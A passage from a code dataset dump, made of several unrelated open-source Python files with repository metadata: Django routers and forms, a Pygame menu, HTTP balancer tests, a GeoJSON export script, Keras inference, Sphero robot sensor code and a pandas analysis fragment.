self.__bb\n self += environment(variables=self.environment_variables)\n","repo_name":"NVIDIA/hpc-container-maker","sub_path":"hpccm/building_blocks/nsight_compute.py","file_name":"nsight_compute.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"63"} +{"seq_id":"1645574176","text":"from rest_framework.routers import SimpleRouter\nfrom core.user.viewsets import UserViewSet\nfrom core.auth.viewsets import LoginViewSet, RegistrationViewSet, RefreshViewSet\nfrom .viewsets import (\n CanvasViewSet,\n NoteViewSet,\n CombatTrackerViewSet,\n CharacterViewSet,\n UserWorkspaceViewset,\n WorkspaceCanvasViewSet,\n NoteCanvasViewSet,\n CombatTrackerCanvasViewSet,\n CombatTrackerCharacterViewSet,\n WorkspaceViewset,\n)\n\n\nroutes = SimpleRouter()\n\n# AUTHENTICATION\nroutes.register(r\"auth/login\", LoginViewSet, basename=\"auth-login\")\nroutes.register(r\"auth/register\", RegistrationViewSet, basename=\"auth-register\")\nroutes.register(r\"auth/refresh\", RefreshViewSet, basename=\"auth-refresh\")\n\n\nroutes.register(r\"canvas\", CanvasViewSet, basename=\"add-canvas\")\nroutes.register(r\"note\", NoteViewSet, basename=\"add-note\")\nroutes.register(r\"combatTracker\", CombatTrackerViewSet, basename=\"add-combatTracker\")\nroutes.register(r\"character\", CharacterViewSet, basename=\"add-character\")\n\nroutes.register(r\"user/workspace\", UserWorkspaceViewset, basename=\"user-workspace\")\nroutes.register(r\"workspace\", WorkspaceViewset, basename=\"workspace\")\nroutes.register(\n r\"workspace/canvas\", WorkspaceCanvasViewSet, basename=\"workspace-canvas\"\n)\nroutes.register(r\"canvas/note\", NoteCanvasViewSet, basename=\"canvas-note\")\nroutes.register(\n r\"canvas/combat_tracker\",\n CombatTrackerCanvasViewSet,\n basename=\"canvas-combat_tracker\",\n)\nroutes.register(\n r\"combat_tracker/character\",\n CombatTrackerCharacterViewSet,\n basename=\"combat_tracker-character\",\n)\n\n# USER\nroutes.register(r\"user\", UserViewSet, basename=\"user\")\n\n\nurlpatterns = [*routes.urls]\n","repo_name":"LukaCrabbe/Final_Work","sub_path":"backend/CoreRoot/core/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7254684163","text":"import collections\nimport pygame\n\nfrom Globals import Globals\nfrom InputProcessor import InputProcessor\nfrom playsound import playsound\n\ngb = Globals\n\nclass ScreenMainMenu:\n OFFSET_FROM_CENTER: float = 50\n SELECTION_SPACING: float = 10\n\n MenuSelection = collections.namedtuple(\"MenuItem\", [\"name\", \"surface\", \"rect\", \"selected\"])\n\n def __init__(self) -> None:\n self.title_logo: pygame.Surface = None\n self.title_logo_rc = [0,0,0,0]\n self.menu_selections = [\"Start\", \"Controls\", \"Credits\"]\n self.menu_dict = {}\n self.selection: int = 0\n\n self.off_font_colour = \"darkgray\"\n self.on_font_colour = \"white\"\n self.font: pygame.font.SysFont = None\n self.font_family = \"Comic Sans MS\"\n self.font_size = 30\n\n self.controls = [\"ARROWS : Move\",\n \"SHIFT : Rotate\",\n \"ENTER : Speed\",\n \"ESC : Main Menu\"]\n self.controls_rc = [0,0,0,0]\n self.controls_surface: pygame.Surface = None\n self.show_controls = False\n\n self.init()\n\n\n def init(self):\n self.init_title()\n self.init_menu()\n self.init_controls_menu()\n self.highlight_menu(self.menu_selections[self.selection])\n\n # setup title-logo\n def init_title(self):\n # load the title image\n self.title_logo = pygame.image.load(\"images/title.png\")\n\n # calculate scale factor to fit in screen\n scale = (gb.screen_width / self.title_logo.get_width()) / 1.5\n\n # fill the rect with the scale-factors\n self.title_logo_rc = pygame.Rect([\n 0, \n 0, \n int(scale * self.title_logo.get_width()), \n int(scale * self.title_logo.get_height())])\n\n # move to center of the screen\n self.title_logo_rc.move_ip(gb.screen_width / 2 - self.title_logo_rc.width / 2, 25)\n\n # scale the image with calculated scaled-rect\n self.title_logo = pygame.transform.scale(self.title_logo, self.title_logo_rc.size)\n #self.title_logo_rc = [title_rect.left, title_rect.top, title_rect.right, title_rect.bottom] \n\n\n # setup menu selections\n def init_menu(self):\n # setup font\n self.font = pygame.font.SysFont(self.font_family, self.font_size)\n\n # setup surfaces for all menus\n for i in range(len(self.menu_selections)):\n surface = self.font.render(self.menu_selections[i], True, self.off_font_colour)\n \n # setup each menu's rect\n rect = surface.get_rect()\n r = pygame.Rect(\n gb.screen_width / 2 - rect.width / 2, \n gb.screen_height / 2 - rect.height / 2 + (i * rect.height) + (i * ScreenMainMenu.SELECTION_SPACING) + ScreenMainMenu.OFFSET_FROM_CENTER,\n gb.screen_width / 2 + rect.width / 2, \n gb.screen_height / 2 + rect.height + (i * rect.height) + (i * ScreenMainMenu.SELECTION_SPACING) + ScreenMainMenu.OFFSET_FROM_CENTER )\n \n # create new updated tuple\n new_menu_item = ScreenMainMenu.MenuSelection(self.menu_selections[i], surface, r, False)\n\n # add new tuple to dictionary\n self.menu_dict.update({self.menu_selections[i] : new_menu_item})\n\n \n # setup menu selections\n def init_controls_menu(self):\n # setup font\n font = pygame.font.SysFont(self.font_family, int(self.font_size / 1.5))\n\n # get height and width of current font\n font_height = font.size('A')[1]\n font_width = font.size('a')[0]\n\n # get dimensions of the text that will be drawn\n max_width = max([len(x) for x in self.controls])\n max_width *= font_width\n max_height = (font_height + ScreenMainMenu.SELECTION_SPACING) * len(self.controls)\n\n # create surface to fit calculations above\n surface = pygame.Surface((max_width, max_height))\n\n # fill surface with normal background for consistency\n surface.fill(gb.grid_bk_colour)\n\n # setup surfaces for all menus\n for i in range(len(self.controls)):\n #render current line onto surface\n sub_surface = font.render(self.controls[i], True, self.on_font_colour)\n \n # get rect for text drawn, and paste it onto main-surface\n rect = sub_surface.get_rect()\n surface.blit(sub_surface, (0, (i * rect.height) + (i * ScreenMainMenu.SELECTION_SPACING)))\n\n # update member-variables\n self.controls_surface = surface\n self.controls_rc = pygame.Rect(gb.screen_width - surface.get_width() - 10,\n gb.screen_height / 2 - max_height / 2 + 100,\n gb.screen_width + surface.get_width() + 10,\n max_height + 100)\n\n\n # highlight menu\n def highlight_menu(self, menu_name: str):\n # if menu doesn't exist then return\n if(menu_name not in self.menu_dict):\n return\n \n # if menu-to-select is already selected (highlighted)\n if(self.menu_dict.get(menu_name).selected == True):\n return\n \n # find menu to be highlighted\n menu_item_select = self.menu_dict.get(menu_name)\n\n # find menu to be de-highlighted\n menu_list = list(self.menu_dict.values())\n menu_items_unselect = [i for i in menu_list if i.selected == True]\n\n # draw highlighted version\n new_surface = self.font.render(menu_item_select.name, True, self.on_font_colour)\n \n # update dictionary\n menu_item_select = menu_item_select._replace(surface = new_surface, selected = True)\n self.menu_dict.pop(menu_name)\n self.menu_dict.update({menu_name : menu_item_select})\n\n # de-highlight others\n for item_name in menu_items_unselect:\n # render with 'off-colour'\n new_surface = self.font.render(item_name.name, True, self.off_font_colour)\n\n # update dictionary\n updated_item = self.menu_dict.get(item_name.name)._replace(surface = new_surface, selected = False)\n self.menu_dict.pop(item_name.name)\n self.menu_dict.update({item_name.name : updated_item})\n\n\n # do selection logic\n def do_selection_logic(self, selection: int):\n # if controls is selected, then toggle show-controls flag\n if (self.menu_selections[selection].lower() == \"controls\"):\n self.show_controls = not self.show_controls\n\n # highlight the selected menu\n result = self.highlight_menu(self.menu_selections[self.selection])\n playsound(\"sounds/menu_select.wav\", False)\n return result\n \n\n # key-down event\n def keydown_down(self, *args):\n # select next selection\n self.selection += 1\n\n # if selection is > number of selections, then loop back\n if(self.selection >= len(self.menu_selections)):\n self.selection = 0\n\n # play click sound\n playsound(\"sounds/menu_select.wav\", False)\n\n # do selection logic\n self.highlight_menu(self.menu_selections[self.selection])\n\n\n # key-up event\n def keydown_up(self, *args):\n # select previous selection\n self.selection -= 1\n\n # if selection is < 0, then loop back\n if(self.selection < 0):\n self.selection = len(self.menu_selections) - 1\n\n # play click sound\n playsound(\"sounds/menu_select.wav\", False)\n\n # do selection logic\n self.highlight_menu(self.menu_selections[self.selection])\n\n\n # key-return event\n def keydown_return(self, *args):\n self.do_selection_logic(self.selection)\n return self.menu_selections[self.selection].lower()\n\n\n # draw all\n def draw(self, screen: pygame.Surface):\n # Fill the background\n screen.fill(gb.grid_bk_colour)\n\n # draw title\n screen.blit(self.title_logo, self.title_logo_rc)\n\n # draw buttons\n for item in self.menu_dict.values():\n screen.blit(item.surface, item.rect)\n\n # draw buttons\n if(self.show_controls == True):\n screen.blit(self.controls_surface, self.controls_rc)\n","repo_name":"RoboAI/Tetris-in-Pygame","sub_path":"ScreenMainMenu.py","file_name":"ScreenMainMenu.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12531471641","text":"import asyncio\n\nimport pytest\nimport yarl\nfrom aiohttp.client_exceptions import ServerTimeoutError\nfrom aiohttp.client_reqrep import ClientResponse\n\nfrom http_client.request_response import RequestBuilder, RequestResult\nfrom pytest_httpserver import HTTPServer\nfrom tests.test_balancing_base import BalancingClientMixin, TestBase\n\n\nclass TestBalancingTracing(TestBase, BalancingClientMixin):\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup_method(self, working_server: HTTPServer):\n super().setup_method(working_server)\n self.register_ports_for_upstream('8081', '8082', '8083')\n\n def create_request_balancer(self, ok_server):\n test_request = RequestBuilder('test', 'test-app', '/test', 'GET')\n return self.request_balancer_builder.build(test_request, None, self.create_execute_request_callback(ok_server),\n None, False, False, False, False, False)\n\n @staticmethod\n def create_execute_request_callback(ok_server):\n async def execute_request(test_request: RequestBuilder) -> RequestResult:\n if test_request.host == ok_server.address:\n url = yarl.URL(test_request.url)\n client_response = ClientResponse(test_request.method, url, writer=None, continue100=None, timer=None,\n request_info=None, traces=None, loop=asyncio.get_event_loop(),\n session=None)\n client_response.status = 200\n result = RequestResult(test_request, client_response.status, response=client_response, elapsed_time=1)\n result.parse_response = False\n else:\n error_message = f'Failed to connect to {test_request.host}'\n result = RequestResult(test_request, 599, elapsed_time=0.1, exc=ServerTimeoutError(error_message))\n\n return result\n\n return execute_request\n\n async def test_tracing_without_retries(self):\n request_balancer = self.create_request_balancer(self.servers[0])\n await request_balancer.execute()\n\n expected_trace = \"127.0.0.1:8081~200~None\"\n actual_trace = request_balancer.get_trace()\n assert actual_trace == expected_trace\n\n async def test_tracing_with_retries(self):\n request_balancer = self.create_request_balancer(self.servers[2])\n await request_balancer.execute()\n\n expected_trace = \"127.0.0.1:8081~599~Failed to connect to 127.0.0.1:8081 -> \" \\\n \"127.0.0.1:8082~599~Failed to connect to 127.0.0.1:8082 -> \" \\\n \"127.0.0.1:8083~200~None\"\n actual_trace = request_balancer.get_trace()\n assert actual_trace == expected_trace\n","repo_name":"hhru/balancing-http-client","sub_path":"tests/test_balancing_tracing.py","file_name":"test_balancing_tracing.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22030719667","text":"import shutil\nimport sys\n\nfrom country_levels_lib.fips import fips_utils\nfrom country_levels_lib.config import export_dir, fixes_dir\nfrom country_levels_lib.geo import calculate_centroid, find_timezone\nfrom country_levels_lib.utils import read_json, osm_url, write_json, wikidata_url\nfrom country_levels_lib.wam.wam_collect import validate_iso1, validate_iso2, simp_dir\nfrom country_levels_lib.wam.wam_download import wam_data_dir\nfrom area import area\n\n\npopulation_map = None\npopulation_fixes = read_json(fixes_dir / 'population.json')\ntimezone_fixes = read_json(fixes_dir / 'timezone.json')\nus_states_by_postal = fips_utils.get_state_data()[1]\niso1_json = None\niso2_json = None\n\n\ndef split_geojson(iso_level: int, simp_level: str):\n global population_map, iso1_json, iso2_json\n if not population_map:\n population_map = read_json(wam_data_dir / 'population.json')\n\n if simp_level != 'high':\n iso1_json = read_json(export_dir / 'iso1.json')\n iso2_json = read_json(export_dir / 'iso2.json')\n\n print(f'Splitting iso{iso_level} to level: {simp_level}')\n file_path = simp_dir / simp_level / f'iso{iso_level}.geojson'\n\n features = read_json(file_path)['features']\n features_sorted = sorted(features, key=lambda i: i['properties']['admin_level'])\n\n features_by_iso = dict()\n\n for feature in features_sorted:\n feature_processed = process_feature_properties(feature, iso_level, simp_level)\n if feature_processed is None:\n continue\n feature_clean = feature_processed['feature']\n\n iso = feature_processed['iso']\n if iso_level == 1:\n if not validate_iso1(iso):\n print(f'invalid iso1: {iso}')\n continue\n else:\n if not validate_iso2(iso):\n print(f'invalid iso2: {iso}')\n continue\n\n features_by_iso.setdefault(iso, list())\n features_by_iso[iso].append(feature_clean)\n\n deduplicated_by_iso = deduplicate_features_by_iso(features_by_iso)\n write_json_and_geojsons(deduplicated_by_iso, iso_level, simp_level)\n\n\ndef process_feature_properties(feature: dict, iso_level: int, simp_level: str):\n prop = feature['properties']\n alltags = prop['alltags']\n\n name = prop.pop('name')\n osm_id = int(prop.pop('id'))\n iso = prop.pop(f'iso{iso_level}')\n countrylevel_id = f'iso{iso_level}:{iso}'\n\n if iso_level == 1:\n iso_json = iso1_json\n else:\n iso_json = iso2_json\n\n if simp_level == 'high':\n centroid = calculate_centroid(feature)\n center_lat = centroid['lat']\n center_lon = centroid['lon']\n area_m2 = int(area(feature['geometry']))\n else:\n center_lat = iso_json[iso]['center_lat']\n center_lon = iso_json[iso]['center_lon']\n area_m2 = iso_json[iso]['area_m2']\n\n if not feature['geometry']:\n print(f' missing geometry: {countrylevel_id}')\n if simp_level == 'high':\n sys.exit('high level missing geometry')\n\n geojson_path = iso_json[iso]['geojson_path']\n feature['geometry'] = get_geometry_from_medium_high(geojson_path)\n\n admin_level = int(prop.pop('admin_level'))\n wikidata_id = prop.pop('wikidata_id', None)\n population = population_map.get(wikidata_id)\n if countrylevel_id in population_fixes:\n if population:\n print(f'Population not needed anymore in fixes: {countrylevel_id}')\n population = population_fixes[countrylevel_id]\n\n timezone = alltags.pop('timezone', None)\n if not timezone:\n timezone = find_timezone(center_lon, center_lat)\n if not timezone:\n timezone = timezone_fixes.get(countrylevel_id)\n if not timezone:\n print(f'missing timezone for {countrylevel_id} {name}')\n\n # override population for US states from Census data\n if iso.startswith('US-'):\n postal_code = iso[3:]\n state_data = us_states_by_postal.get(postal_code, {})\n population_from_census = state_data.get('population')\n if population_from_census is not None:\n population = population_from_census\n\n wikipedia_from_prop = prop.pop('wikipedia', None)\n wikipedia_from_alltags = alltags.pop('wikipedia', None)\n if (\n wikipedia_from_prop\n and wikipedia_from_alltags\n and wikipedia_from_prop != wikipedia_from_alltags\n ):\n print(wikipedia_from_prop, wikipedia_from_alltags)\n wikipedia_id = wikipedia_from_alltags\n if wikipedia_from_prop:\n wikipedia_id = wikipedia_from_prop\n\n feature.pop('bbox', None)\n\n for key in ['boundary', 'note', 'rpath', 'srid', 'timestamp']:\n prop.pop(key, None)\n\n for key in [\n 'ISO3166-1',\n 'ISO3166-1:alpha2',\n 'ISO3166-1:numeric',\n 'ISO3166-2',\n 'ISO3166-2:alpha2',\n 'ISO3166-2:numeric',\n 'land_area',\n 'wikidata',\n ]:\n alltags.pop(key, None)\n\n new_prop = {\n 'name': name,\n f'iso{iso_level}': iso,\n 'admin_level': admin_level,\n 'osm_id': osm_id,\n 'countrylevel_id': countrylevel_id,\n 'osm_data': prop,\n 'center_lat': round(center_lat, 2),\n 'center_lon': round(center_lon, 2),\n 'area_m2': area_m2,\n }\n\n if timezone:\n new_prop['timezone'] = timezone\n\n if population:\n new_prop['population'] = population\n\n if wikidata_id:\n new_prop['wikidata_id'] = wikidata_id\n\n if wikipedia_id:\n new_prop['wikipedia_id'] = wikipedia_id\n\n feature['properties'] = new_prop\n\n return {\n 'feature': feature,\n 'iso': iso,\n }\n\n\ndef deduplicate_features_by_iso(features_by_iso: dict):\n deduplicated = {}\n for iso, features in features_by_iso.items():\n if len(features) == 1:\n deduplicated[iso] = features[0]\n else:\n print(f' duplicate features for: {iso}')\n for feature in features:\n prop = feature['properties']\n name = prop['name']\n admin_level = prop['admin_level']\n osm_id = prop['osm_id']\n population = prop.get('population')\n wikidata_id = prop.get('wikidata_id')\n\n print(\n f' {name} '\n f'admin_level: {admin_level} '\n f'population: {population} '\n f'{osm_url(osm_id)} '\n f'{wikidata_url(wikidata_id)} '\n )\n\n # pick the first one by admin_level\n features_sorted = sorted(features, key=lambda k: k['properties']['admin_level'])\n deduplicated[iso] = features_sorted[0]\n print()\n return deduplicated\n\n\ndef write_json_and_geojsons(deduplicated_by_iso: dict, iso_level: int, simp_level: int):\n assert iso_level in [1, 2]\n\n level_subdir = export_dir / 'geojson' / simp_level / f'iso{iso_level}'\n shutil.rmtree(level_subdir, ignore_errors=True)\n level_subdir.mkdir(parents=True)\n\n json_data = {}\n for iso, feature in deduplicated_by_iso.items():\n new_prop_without_osm_data = {\n k: v for k, v in feature['properties'].items() if k != 'osm_data'\n }\n json_data[iso] = new_prop_without_osm_data\n\n if iso_level == 1:\n write_json(level_subdir / f'{iso}.geojson', feature)\n json_data[iso]['geojson_path'] = f'iso1/{iso}.geojson'\n\n else:\n iso2_start, iso2_end = iso.split('-')\n\n iso2_subdir = level_subdir / iso2_start\n iso2_subdir.mkdir(exist_ok=True)\n\n write_json(level_subdir / iso2_start / f'{iso}.geojson', feature)\n json_data[iso]['geojson_path'] = f'iso2/{iso2_start}/{iso}.geojson'\n\n if simp_level == 'high':\n write_json(export_dir / f'iso{iso_level}.json', json_data, indent=2, sort_keys=True)\n\n\ndef get_geometry_from_medium_high(geojson_path):\n medium_geojson_path = export_dir / 'geojson' / 'medium' / geojson_path\n high_geojson_path = export_dir / 'geojson' / 'high' / geojson_path\n\n if medium_geojson_path.is_file():\n medium_geojson = read_json(medium_geojson_path)\n if medium_geojson['geometry']:\n print(' using geometry from medium geojson')\n return medium_geojson['geometry']\n\n high_geojson = read_json(high_geojson_path)\n print(' using geometry from high geojson')\n return high_geojson['geometry']\n","repo_name":"hyperknot/country-levels","sub_path":"country_levels_lib/wam/wam_export.py","file_name":"wam_export.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"63"} +{"seq_id":"23120667317","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# 项目实战讨论QQ群630011153 144081101\n# https://github.com/china-testing/python-api-tesing/blob/master/practices/keras/test_kaggle_natural.py\n# 数据集:https://itbooks.pipipan.com/fs/18113597-329046186\n# CreateDate: 2019-01-04\nfrom keras.preprocessing.image import ImageDataGenerator\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import load_model\n\n\ntrain_path = 'images/train/'\ntest_path = 'images/test/'\nbatch_size = 16\nimage_size = 224\nnum_class = 8\n\n\nmodel = load_model('fine_tune.h5')\n\ntrain_datagen = ImageDataGenerator()\n\ntrain_generator = train_datagen.flow_from_directory(\n directory=train_path, target_size=(image_size,image_size),\n batch_size=batch_size, class_mode='categorical',\n color_mode='rgb', shuffle=True)\n\n\ntest_datagen = ImageDataGenerator()\n\ntest_generator = test_datagen.flow_from_directory(\n directory=test_path, target_size=(image_size, image_size),\n color_mode='rgb', shuffle=False, class_mode='categorical', batch_size=1)\n\nfilenames = test_generator.filenames\nnb_samples = len(filenames)\n\nfig=plt.figure()\ncolumns = 4\nrows = 4\nfor i in range(1, columns*rows -1):\n x_batch, y_batch = test_generator.next()\n\n name = model.predict(x_batch)\n name = np.argmax(name, axis=-1)\n true_name = y_batch\n true_name = np.argmax(true_name, axis=-1)\n\n label_map = (test_generator.class_indices)\n label_map = dict((v,k) for k,v in label_map.items()) #flip k,v\n predictions = [label_map[k] for k in name]\n true_value = [label_map[k] for k in true_name]\n\n image = x_batch[0].astype(np.int)\n fig.add_subplot(rows, columns, i)\n plt.title(str(predictions[0]) + ':' + str(true_value[0]))\n plt.imshow(image)\nplt.show()","repo_name":"china-testing/python-api-tesing","sub_path":"practices/keras/test_kaggle_natural.py","file_name":"test_kaggle_natural.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":2314,"dataset":"github-code","pt":"63"} +{"seq_id":"20959082771","text":"import sys\nimport time\n\nsys.path.append('/home/pi/sphero-sdk-raspberrypi-python')\n\nfrom sphero_sdk import SpheroRvrObserver\nfrom sphero_sdk import RvrStreamingServices\n\nimport qwiic\nrvr = SpheroRvrObserver()\n\n# Variables to store VL53L1X sensors\ntof_fw = None\ntof_bw = None\n\n# Dict to store current RVR position\nposition = {\"x\":0, \"y\":0, \"yaw\":0}\n\n# Change VL53L1X I2C addresses and initialize ranging\n# Sensor on MUX channel 3 should get address 0x28\n# Sensor at MUX channel 4 can keep the default 0x29\ndef init_tof():\n global tof_fw, tof_bw\n # Get MUX\n mux = qwiic.QwiicTCA9548A()\n mux.disable_all()\n # Enable channel for forward range sensor\n mux.enable_channels([3])\n # Check if already configured\n avail_addresses = qwiic.scan()\n print(avail_addresses)\n if 0x29 in avail_addresses:\n tof_fw = qwiic.QwiicVL53L1X(0x29)\n tof_fw.sensor_init()\n # Change address\n tof_fw.set_i2c_address(0x28)\n else: \n tof_fw = qwiic.QwiicVL53L1X(0x28)\n tof_fw.sensor_init()\n\n # Enable channel for backward range sensor\n mux.enable_channels([3, 4])\n tof_bw = qwiic.QwiicVL53L1X(0x29)\n tof_bw.sensor_init()\n\n # Enable sensors\n time.sleep(0.1)\n tof_fw.start_ranging()\n tof_bw.start_ranging()\n\n# Callback functions for sensor data streaming service\ndef locator_handler(data):\n if data['Locator']['is_valid']:\n global position\n position['x'] = data['Locator']['X']\n position['y'] = data['Locator']['Y']\n\ndef imu_handler(data):\n if data['IMU']['is_valid']:\n global position\n position['yaw'] = data['IMU']['Yaw']\n\n\ndef main():\n rvr.wake()\n init_tof()\n # Give RVR time to wake up\n time.sleep(2)\n # Reset position\n rvr.drive_control.reset_heading()\n rvr.reset_locator_x_and_y()\n time.sleep(0.5)\n\n # Bind streaming services to handler functions\n rvr.sensor_control.add_sensor_data_handler(\n service=RvrStreamingServices.imu,\n handler=imu_handler\n )\n rvr.sensor_control.add_sensor_data_handler(\n service=RvrStreamingServices.locator,\n handler=locator_handler\n )\n rvr.sensor_control.start(interval=100) # Start streaming at fixed interval (ms)\n\n while True:\n # Delay to allow RVR to stream sensor data\n time.sleep(0.2)\n fw_range = tof_fw.get_distance()\n bw_range = tof_bw.get_distance() \n\n print( \"X: \" + f'{position[\"x\"]:.3f}' + \"m\" +\n \"\\tY: \" + f'{position[\"y\"]:.3f}' + \"m\" +\n \"\\tYaw: \" + f'{position[\"yaw\"]:.1f}' + \"deg\" + \n \"\\tRange F: \" + f'{fw_range*1e-3:.3f}' + \"mm\" +\n \"\\tRange B: \" + f'{bw_range*1e-3:.3f}' + \"mm\"\n )\n\n\n# Start main loop if script is run directly\nif __name__ == '__main__':\n # Wrap in try-catch to handle \n try:\n main()\n except KeyboardInterrupt:\n print('\\nProgram terminated with keyboard interrupt.')\n finally:\n rvr.sensor_control.clear()\n tof_fw.stop_ranging()\n tof_bw.stop_ranging()\n # Delay to allow RVR issue command before closing\n time.sleep(.5)\n rvr.close()\n","repo_name":"vinjarv/AIS2203-rvr","sub_path":"Raspberry_Pi/examples/sensor-streaming.py","file_name":"sensor-streaming.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28805796627","text":"from django import forms\nfrom django.template.defaultfilters import slugify\nfrom django.conf import settings\n\nfrom airmozilla.base.forms import BaseModelForm\nfrom airmozilla.main.models import (\n SuggestedEvent,\n Event,\n Tag,\n Channel,\n SuggestedEventComment\n)\n\n\nclass StartForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('title',)\n\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user')\n super(StartForm, self).__init__(*args, **kwargs)\n\n def clean_title(self):\n value = self.cleaned_data['title']\n if Event.objects.filter(title__iexact=value):\n raise forms.ValidationError(\"Event title already used\")\n if SuggestedEvent.objects.filter(title__iexact=value, user=self.user):\n raise forms.ValidationError(\n \"You already have a suggest event with this title\"\n )\n return value\n\n\nclass TitleForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('title', 'slug')\n\n def clean_slug(self):\n value = self.cleaned_data['slug']\n if value:\n if Event.objects.filter(slug__iexact=value):\n raise forms.ValidationError('Already taken')\n return value\n\n def clean_title(self):\n value = self.cleaned_data['title']\n if Event.objects.filter(title__iexact=value):\n raise forms.ValidationError(\"Event title already used\")\n return value\n\n def clean(self):\n cleaned_data = super(TitleForm, self).clean()\n if 'slug' in cleaned_data and 'title' in cleaned_data:\n if not cleaned_data['slug']:\n cleaned_data['slug'] = slugify(cleaned_data['title'])\n if Event.objects.filter(slug=cleaned_data['slug']):\n raise forms.ValidationError('Slug already taken')\n return cleaned_data\n\n\nclass DescriptionForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('description', 'short_description')\n\n def __init__(self, *args, **kwargs):\n super(DescriptionForm, self).__init__(*args, **kwargs)\n self.fields['description'].help_text = (\n \"Write a description of your event that will entice viewers to \"\n \"watch.<br>\"\n \"An interesting description improves the chances of your \"\n \"presentation being picked up by bloggers and other websites.\"\n \"<br>\"\n \"Please phrase your description in the present tense. \"\n )\n self.fields['short_description'].help_text = (\n \"This Short Description is used in public feeds and tweets. \"\n \"<br>If your event is non-public be careful \"\n \"<b>not to \"\n \"disclose sensitive information here</b>.\"\n \"<br>If left blank the system will use the first few \"\n \"words of the description above.\"\n )\n\n\nclass DetailsForm(BaseModelForm):\n\n tags = forms.CharField(required=False)\n\n class Meta:\n model = SuggestedEvent\n fields = (\n 'location',\n 'start_time',\n 'privacy',\n 'category',\n 'tags',\n 'channels',\n 'additional_links',\n 'remote_presenters',\n )\n\n def __init__(self, *args, **kwargs):\n super(DetailsForm, self).__init__(*args, **kwargs)\n self.fields['channels'].required = False\n self.fields['location'].required = True\n self.fields['start_time'].required = True\n if 'instance' in kwargs:\n event = kwargs['instance']\n if event.pk:\n tag_format = lambda objects: ','.join(map(unicode, objects))\n tags_formatted = tag_format(event.tags.all())\n self.initial['tags'] = tags_formatted\n\n self.fields['location'].help_text = (\n \"Choose an Air Mozilla origination point. <br>\"\n \"If the location of your event isn't on the list, \"\n \"choose Live Remote. <br>\"\n \"Note that live remote dates and times are UTC.\"\n )\n self.fields['tags'].help_text = (\n \"Enter some keywords to help viewers find the recording of your \"\n \"event. <br>Press return between keywords\"\n )\n self.fields['channels'].help_text = (\n \"Should your event appear in one or more particular \"\n \"Air Mozilla Channels? <br>If in doubt, select Main.\"\n )\n self.fields['additional_links'].help_text = (\n \"If you have links to slides, the presenter's blog, or other \"\n \"relevant links, list them here and they will appear on \"\n \"the event page.\"\n )\n self.fields['remote_presenters'].help_text = (\n \"If there will be presenters who present remotely, please enter \"\n \"email addresses, names and locations about these presenters.\"\n )\n\n self.fields['additional_links'].widget.attrs['rows'] = 3\n self.fields['remote_presenters'].widget.attrs['rows'] = 3\n\n def clean_tags(self):\n tags = self.cleaned_data['tags']\n split_tags = [t.strip() for t in tags.split(',') if t.strip()]\n final_tags = []\n for tag_name in split_tags:\n t, __ = Tag.objects.get_or_create(name=tag_name)\n final_tags.append(t)\n return final_tags\n\n def clean_channels(self):\n channels = self.cleaned_data['channels']\n if not channels:\n channels.append(\n Channel.objects.get(slug=settings.DEFAULT_CHANNEL_SLUG)\n )\n return channels\n\n\nclass PlaceholderForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('placeholder_img',)\n\n def __init__(self, *args, **kwargs):\n super(PlaceholderForm, self).__init__(*args, **kwargs)\n self.fields['placeholder_img'].help_text = (\n \"We need a placeholder image for your event. <br>\"\n \"A recent head-shot of the speaker is preferred. <br>\"\n \"Placeholder images should be 200 x 200 px or larger.\"\n )\n\n#class ParticipantsForm(BaseModelForm):\n#\n# participants = forms.CharField(required=False)\n#\n# class Meta:\n# model = SuggestedEvent\n# fields = ('participants',)\n#\n# def clean_participants(self):\n# participants = self.cleaned_data['participants']\n# split_participants = [p.strip() for p in participants.split(',')\n# if p.strip()]\n# final_participants = []\n# for participant_name in split_participants:\n# p = Participant.objects.get(name=participant_name)\n# final_participants.append(p)\n# return final_participants\n#\n\n\nclass SuggestedEventCommentForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEventComment\n fields = ('comment',)\n","repo_name":"einBambi/airmozilla","sub_path":"airmozilla/suggest/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"16009028239","text":"import numpy as np\nimport pandas as pd\nimport os\nos.chdir('/home/vasste/ml')\nfrom telecom.train_columns import *\nos.chdir('/home/vasste/mlbootcap/TelecomDataCup/dataset')\n\nc = pd.read_pickle('train/subs_csi_train.pk')\nf = pd.read_pickle('train/subs_features_train.pk')\nf['COM_CAT#34'] = f['COM_CAT#34'].fillna(f.describe()['COM_CAT#34']['75%'], axis=0)\nf['COM_CAT#34'] = f['COM_CAT#34'].astype(int)\n\nf = f.join(c)\ntarget = 'CSI'\ndf = f\nfeature = 'COM_CAT#34'\nfor i in ['COM_CAT#1', 'COM_CAT#34', 'COM_CAT#2', 'COM_CAT#3', 'INTERNET_TYPE_ID', 'DEVICE_TYPE_ID',\n 'COM_CAT#25', 'COM_CAT#26', 'ACT']:\n f[i] = f[i].astype('category')\n lst = []\n for i in range(df[feature].nunique()):\n val = list(df[feature].unique())[i]\n lst.append([feature, # Variable\n val, # Value\n df[df[feature] == 